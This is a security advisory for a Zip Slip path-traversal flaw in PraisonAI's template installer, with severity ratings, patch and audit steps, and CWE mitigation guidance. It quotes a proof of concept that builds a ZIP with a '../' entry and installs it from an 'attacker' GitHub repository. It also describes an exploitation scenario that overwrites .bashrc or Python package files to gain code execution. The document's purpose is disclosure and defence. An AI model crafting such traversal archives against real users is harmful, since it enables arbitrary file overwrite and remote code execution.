CVE-2026-39307: PraisonAI: Zip Slip enables arbitrary file write / RCE
GHSA-4ph2-f6pf-79wv HIGH CISA: TRACK*PraisonAI's template installation feature fails to sanitize file paths in ZIP archives before extraction, allowing a crafted template to write files anywhere on the victim's filesystem via a classic Zip Slip attack (CWE-23). Any developer or AI engineer who runs `praisonai templates install` on a malicious template — whether tricked through social engineering or via a compromised community repository on GitHub — could have system files, dotfiles, or application code silently overwritten, escalating to full remote code execution. With no privileges required, network-accessible delivery, and a CVSS of 8.1, this is low-effort and high-impact; the CVE is not in CISA KEV and no public exploit scanner exists yet, but the PoC is trivially reproducible from the advisory itself, meaning any motivated actor can operationalize it within minutes. Upgrade all PraisonAI deployments immediately to version 4.5.113, and audit any community templates installed from unverified sources prior to the patch.
What is the risk?
CVSS 8.1 HIGH with vector AV:N/AC:L/PR:N/UI:R reflects a network-delivered, low-complexity attack requiring only user interaction — exactly the kind of social engineering that targets AI practitioners installing community content. While not actively exploited (no KEV, no EPSS data), the Zip Slip technique is well-documented and the PoC is publicly disclosed in the GHSA advisory, dramatically lowering attacker barrier. The PraisonAI ecosystem attracts developers building multi-agent pipelines; this demographic often prioritizes speed over operational security hygiene, increasing the realistic exploitation surface. Impact is rated HIGH for both integrity (arbitrary file overwrite) and availability (system corruption), with a plausible path to RCE by overwriting startup scripts, cron jobs, or Python package files. Six other CVEs in the same package suggest a pattern of insufficient security review in PraisonAI's codebase.
What systems are affected?
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| PraisonAI | pip | <= 4.5.112 | 4.5.113 |
Do you use PraisonAI? You're affected.
How severe is it?
What is the attack surface?
What should I do?
6 steps-
PATCH IMMEDIATELY
Upgrade PraisonAI to version 4.5.113 or later — this is the only complete fix.
-
AUDIT
Review all templates installed from community sources (especially GitHub) prior to the patch date; check for unexpected files outside intended directories.
-
WORKAROUND (if patching is delayed): Only install templates from verified, internal sources; disable external template installation via network policy or firewall rules blocking GitHub raw content for the PraisonAI process.
-
DETECT
Search for recently modified files outside expected application directories following any
praisonai templates installinvocations; monitor for unexpected writes to /tmp, home directories, or system paths during template extraction. -
HARDEN
For custom deployments, validate the fix in 4.5.113 uses safe path extraction (e.g., checking that each member's resolved path stays within the target directory before extraction).
-
POLICY
Treat community AI agent templates with the same risk posture as unverified third-party code — require internal review before installation in sensitive environments.
What does CISA's SSVC say?
Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.
How is it classified?
Which compliance frameworks are affected?
This CVE is relevant to:
Frequently Asked Questions
What is CVE-2026-39307?
PraisonAI's template installation feature fails to sanitize file paths in ZIP archives before extraction, allowing a crafted template to write files anywhere on the victim's filesystem via a classic Zip Slip attack (CWE-23). Any developer or AI engineer who runs `praisonai templates install` on a malicious template — whether tricked through social engineering or via a compromised community repository on GitHub — could have system files, dotfiles, or application code silently overwritten, escalating to full remote code execution. With no privileges required, network-accessible delivery, and a CVSS of 8.1, this is low-effort and high-impact; the CVE is not in CISA KEV and no public exploit scanner exists yet, but the PoC is trivially reproducible from the advisory itself, meaning any motivated actor can operationalize it within minutes. Upgrade all PraisonAI deployments immediately to version 4.5.113, and audit any community templates installed from unverified sources prior to the patch.
Is CVE-2026-39307 actively exploited?
No confirmed active exploitation of CVE-2026-39307 has been reported, but organizations should still patch proactively.
How to fix CVE-2026-39307?
1. PATCH IMMEDIATELY: Upgrade PraisonAI to version 4.5.113 or later — this is the only complete fix. 2. AUDIT: Review all templates installed from community sources (especially GitHub) prior to the patch date; check for unexpected files outside intended directories. 3. WORKAROUND (if patching is delayed): Only install templates from verified, internal sources; disable external template installation via network policy or firewall rules blocking GitHub raw content for the PraisonAI process. 4. DETECT: Search for recently modified files outside expected application directories following any `praisonai templates install` invocations; monitor for unexpected writes to /tmp, home directories, or system paths during template extraction. 5. HARDEN: For custom deployments, validate the fix in 4.5.113 uses safe path extraction (e.g., checking that each member's resolved path stays within the target directory before extraction). 6. POLICY: Treat community AI agent templates with the same risk posture as unverified third-party code — require internal review before installation in sensitive environments.
What systems are affected by CVE-2026-39307?
This vulnerability affects the following AI/ML architecture patterns: agent frameworks, AI development environments, training pipelines, CI/CD ML pipelines.
What is the CVSS score for CVE-2026-39307?
CVE-2026-39307 has a CVSS v3.1 base score of 8.1 (HIGH). The EPSS exploitation probability is 0.31%.
What is the AI security impact?
Affected AI Architectures
MITRE ATLAS Techniques
AML.T0010.001 AI Software AML.T0011 User Execution AML.T0011.001 Malicious Package AML.T0079 Stage Capabilities AML.T0104 Publish Poisoned AI Agent Tool Compliance Controls Affected
What are the technical details?
Original Advisory
The PraisonAI templates installation feature is vulnerable to a "Zip Slip" Arbitrary File Write attack. When downloading and extracting template archives from external sources (e.g., GitHub), the application uses Python's `zipfile.extractall()` without verifying if the files within the archive resolve outside of the intended extraction directory. ### Details Location: `src/praisonai/praisonai/cli/features/templates.py` (Line 852) Vulnerable Code snippet: ```python zip_ref.extractall(tmpdir) ``` During installation, the CLI downloads a ZIP archive and extracts it directly into a temporary directory using `zip_ref.extractall(tmpdir)`. A specially crafted ZIP archive can contain file entries with relative paths (such as `../../../../tmp/evil.sh`). If extracting this archive in older Python versions or environments where extraction rules aren't strict, `extractall` will write these files outside the target directory, allowing an attacker to overwrite arbitrary files on the victim's filesystem. ### PoC 1. Generate a malicious zip payload: ```python import zipfile with zipfile.ZipFile('malicious_template.zip', 'w') as z: # Adding a file that traverses directories z.writestr('../../../../../../../tmp/zip_slip_pwned.txt', 'pwned by zip slip') ``` 2. Trick a user into installing the malicious template: ```bash praisonai templates install github:attacker/malicious_template ``` 3. Observe the `zip_slip_pwned.txt` file created in `/tmp/` on the victim's machine. ### Impact This is an Arbitrary File Write vulnerability affecting any user who installs community templates. It can be leveraged to overwrite system files, user dotfiles, or application code, ultimately leading to system corruption or full Remote Code Execution (RCE).
Exploitation Scenario
An attacker creates a GitHub repository named something legitimate like `praisonai-enterprise-templates` or `langchain-agent-templates`, publishes a README with convincing documentation, and seeds initial stars. The repository contains a `templates.zip` archive where one or more entries use path traversal sequences (e.g., `../../../../home/user/.bashrc` or `../../../../usr/local/lib/python3.x/site-packages/praisonai/__init__.py`). The attacker then promotes the template in PraisonAI community channels, Discord servers, or via a phishing email targeting AI engineers. When a victim runs `praisonai templates install github:attacker/enterprise-templates`, the CLI fetches and extracts the ZIP without path validation, silently writing the malicious payload to the traversal target. If the target is a Python package file, subsequent imports execute attacker-controlled code; if it is a shell dotfile, the payload executes on next login. In a CI/CD context, the compromise propagates to every build run on that agent.
Weaknesses (CWE)
CWE-23 — Relative Path Traversal: The product uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize sequences such as ".." that can resolve to a location that is outside of that directory.
- [Implementation] Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylis
- [Implementation] Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. Use a built-in path canonicalization function (such as realpath() in C) that produces the canonical version of the pathname, which effectively removes ".." sequences and symbolic links (CWE-23, CWE-59). This includes: realpath() in C getCanonicalPath() in Java GetFullPath() in ASP.NET realpath() or abs_path() in Perl realpath() in PHP
Source: MITRE CWE corpus.
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H References
Timeline
Related Vulnerabilities
GHSA-vmmj-pfw7-fjwp 9.9 praisonai: sandbox escape gives RCE via codeMode tool
Same package: praisonai CVE-2026-47392 9.9 praisonaiagents: RCE via Python sandbox bypass
Same package: praisonai GHSA-vc46-vw85-3wvm 9.8 PraisonAI: RCE via malicious workflow YAML execution
Same package: praisonai GHSA-9qhq-v63v-fv3j 9.8 PraisonAI: RCE via MCP command injection
Same package: praisonai CVE-2026-39890 9.8 PraisonAI: YAML deserialization enables unauthenticated RCE
Same package: praisonai